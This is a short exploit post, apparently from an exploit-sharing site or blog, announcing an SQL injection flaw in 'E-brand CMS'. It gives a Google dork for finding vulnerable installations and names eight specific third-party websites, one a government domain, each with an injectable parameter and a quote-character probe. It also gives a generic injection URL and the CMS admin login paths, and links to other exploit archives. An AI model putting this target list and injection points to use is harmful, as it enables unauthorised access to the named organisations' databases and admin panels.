################################################## # Exploit Title: E-brand CMS Vuln SQL injection Vulnerability # Vendor: http://www.ebrand.com.br/ # Author: xDarkSton3x # E-mail : xdarkston3x@msn.com #Twitter: @xdarkston3x # Category: webapps # Google dork: intext:desenvolvido por e-brand # Example Sites : http://www.institutotommasi.org.br/projeto_selecionado.php?Cod_Projeto=' http://www.esconvention.com.br/turismo/evento_escolhido.asp?Cod_Evento=' http://www.quintelatorres.com.br/noticias_interno.php?Cod_Noticia=' http://www.landsteiner.com.br/noticias.php?Cod_NoticiaCategoria=' http://www.geres.gov.br/noticias_detalhe.php?Cod_Noticia=' http://www.vitoriahospitalar.com.br/evento-detalhe.php?evento=' http://www.novapol.com.br/produto.php?Cod_Produto=' http://www.cecon.med.br/dicas-detalhe.php?iDica=' ################################################## [~]Exploit/p0c : http://www.site.com/x.php?var=[sqli] [~]Panel Admin : /adm/login.php /adm/
[~]Reporte :
http://www.1337day.com/exploits/18083
http://w00t.pro/2012/04/20/2782/
0 Responses to 'E-brand CMS Vuln SQL injection Vulnerability'
Publicar un comentario